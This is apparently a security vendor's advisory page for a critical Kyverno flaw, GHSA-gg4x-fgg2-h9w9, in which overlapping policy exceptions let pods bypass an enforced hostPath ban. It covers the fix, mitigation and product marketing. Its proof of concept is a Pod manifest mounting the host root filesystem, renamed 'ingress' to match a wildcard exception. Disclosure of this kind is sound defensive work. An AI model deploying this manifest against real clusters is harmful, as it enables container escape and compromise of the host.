How severe is GHSA-gg4x-fgg2-h9w9?

GHSA-gg4x-fgg2-h9w9 has a CVSS score of 9/10, rated CRITICAL. Immediate patching is strongly recommended.

Which packages are affected by GHSA-gg4x-fgg2-h9w9?

GHSA-gg4x-fgg2-h9w9 affects the following packages: github.com/kyverno/kyverno (Go). Ecosystems affected: Go.

How do I fix GHSA-gg4x-fgg2-h9w9?

Update github.com/kyverno/kyverno to 1.13.0 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-gg4x-fgg2-h9w9 is resolved across your whole dependency graph.

How do I detect GHSA-gg4x-fgg2-h9w9 in my Go dependencies?

Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for github.com/kyverno/kyverno. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.

How do I mitigate GHSA-gg4x-fgg2-h9w9 if there is no patch (or I can't update yet)?

If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.

How does O3 Security protect against GHSA-gg4x-fgg2-h9w9?

O3 pinpoints whether GHSA-gg4x-fgg2-h9w9 is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.

Is GHSA-gg4x-fgg2-h9w9 actively exploited in the wild?

No public exploit code has been indexed for GHSA-gg4x-fgg2-h9w9 yet. This does not mean the vulnerability cannot be exploited — absence of public exploits does not imply safety. Apply the recommended fix and use O3 Security to monitor your exposure.

When was GHSA-gg4x-fgg2-h9w9 published, and has it been updated?

GHSA-gg4x-fgg2-h9w9 was published on January 6, 2026 and was last updated on January 12, 2026. Advisory data evolves as severity scores, affected ranges, and exploit intelligence are revised — always check the latest version of the advisory before acting.

🐹 Go

GHSA-gg4x-fgg2-h9w9

CRITICAL

Bypassing Kyverno Policies via Double Policy Exceptions

Also known asGO-2026-4285

Published

Jan 6, 2026

Updated

Jan 12, 2026

Affected

1 pkg

Patched

1 / 1

Exploits

None indexed

Blast Radius

1 pkg affected

🐹github.com/kyverno/kyverno

Real-time download stats are indexed for npm and PyPI packages. This vulnerability affects Go packages — download data is not available via public APIs for these ecosystems.

Description

Summary

If a cluster has a Kyverno policy in enforce mode and there are two exceptions, this allows the policy to be bypassed, even if the first exception is more restrictive than the second.

Details

The following policy was applied:

apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: disallow-host-path
  annotations:
    policies.kyverno.io/title: Disallow hostPath
    policies.kyverno.io/category: Pod Security Standards (Baseline)
    policies.kyverno.io/severity: medium
    policies.kyverno.io/subject: Pod,Volume
    kyverno.io/kyverno-version: 1.6.0
    kyverno.io/kubernetes-version: "1.22-1.23"
    policies.kyverno.io/description: >-
      HostPath volumes let Pods use host directories and volumes in containers.
      Using host resources can be used to access shared data or escalate privileges
      and should not be allowed. This policy ensures no hostPath volumes are in use.
spec:
  validationFailureAction: Enforce
  background: true
  rules:
    - name: host-path
      match:
        any:
        - resources:
            kinds:
              - Pod
      validate:
        message: >-
          HostPath volumes are forbidden. The field spec.volumes[*].hostPath must be unset.
        pattern:
          spec:
            =(volumes):
              - X(hostPath): "null"

And two exceptions:

apiVersion: kyverno.io/v2beta1
kind: PolicyException
metadata:
  name: disallow-host-path-exception
  namespace: kyverno
spec:
  exceptions:
  - policyName: disallow-host-path
    ruleNames:
    - host-path
  match:
    any:
    - resources:
        kinds:
        - DaemonSet
        - Deployment
        - Job
        - StatefulSet
        - ReplicaSet
        - ReplicationController
        - Pod
        - CronJob
        namespaces:
        - luntry
        - tstkyverno
        - examplens

apiVersion: kyverno.io/v2beta1
kind: PolicyException
metadata:
  name: disallow-host-path-exception-names
  namespace: kyverno
spec:
  exceptions:
  - policyName: disallow-host-path
    ruleNames:
    - host-path
  match:
    any:
    - resources:
        kinds:
        - DaemonSet
        - Deployment
        - Job
        - StatefulSet
        - ReplicaSet
        - ReplicationController
        - Pod
        - CronJob
        names:
        - '*haproxy*'
        - '*ingress*'

Trying to apply such a yaml will result in the expected ban:

apiVersion: v1
kind: Pod
metadata:
  name: mtkpi
  labels:
    app: pentest
spec:
  containers:
  - name: mtkpi
    image: ubuntu
    volumeMounts:
    - mountPath: /host
      name: noderoot
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ]  
  volumes:
  - name: noderoot
    hostPath:
      path: /

However, if the load name is changed to satisfy the second exception, the restrictions can be bypassed:

apiVersion: v1
kind: Pod
metadata:
  name: ingress
  labels:
    app: pentest
spec:
  containers:
  - name: mtkpi
    image: ubuntu
    volumeMounts:
    - mountPath: /host
      name: noderoot
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ]  
  volumes:
  - name: noderoot
    hostPath:
      path: /

It turns out that the second exception is higher in priority for Kyverno and allows for bypass of the restrictions.

Impact

The security restrictions can be bypassed.

Affected Packages

1 total 1 fixed

Ecosystem	Package	Vulnerable range	Fix
🐹Go	`github.com/kyverno/kyverno`	≥ 1.9.0&&< 1.13.0	1.13.0

Detection & mitigation playbook

Open-source dependency

Detect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for github.com/kyverno/kyverno. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
Fix
Update github.com/kyverno/kyverno to 1.13.0 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-gg4x-fgg2-h9w9 is resolved across your whole dependency graph.
Workarounds
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 pinpoints whether GHSA-gg4x-fgg2-h9w9 is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.

Tailored to GHSA-gg4x-fgg2-h9w9. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.

Frequently Asked Questions

### Summary If a cluster has a `Kyverno` policy in enforce mode and there are two exceptions, this allows the policy to be bypassed, even if the first exception is more restrictive than the second. ### Details The following policy was applied: ```yaml apiVersion: kyverno.io/v1 kind: ClusterPolicy metadata: name: disallow-host-path annotations: policies.kyverno.io/title: Disallow hostPath policies.kyverno.io/category: Pod Security Standards (Baseline) policies.kyverno.io/severity: medium policies.kyverno.io/subject: Pod,Volume kyverno.io/kyverno-version: 1.6.0 kyv

O3 Security · Impact-Aware SCA

Is GHSA-gg4x-fgg2-h9w9 in your dependencies?

O3 detects GHSA-gg4x-fgg2-h9w9 across Go dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.

Scan my dependencies How O3 SCA works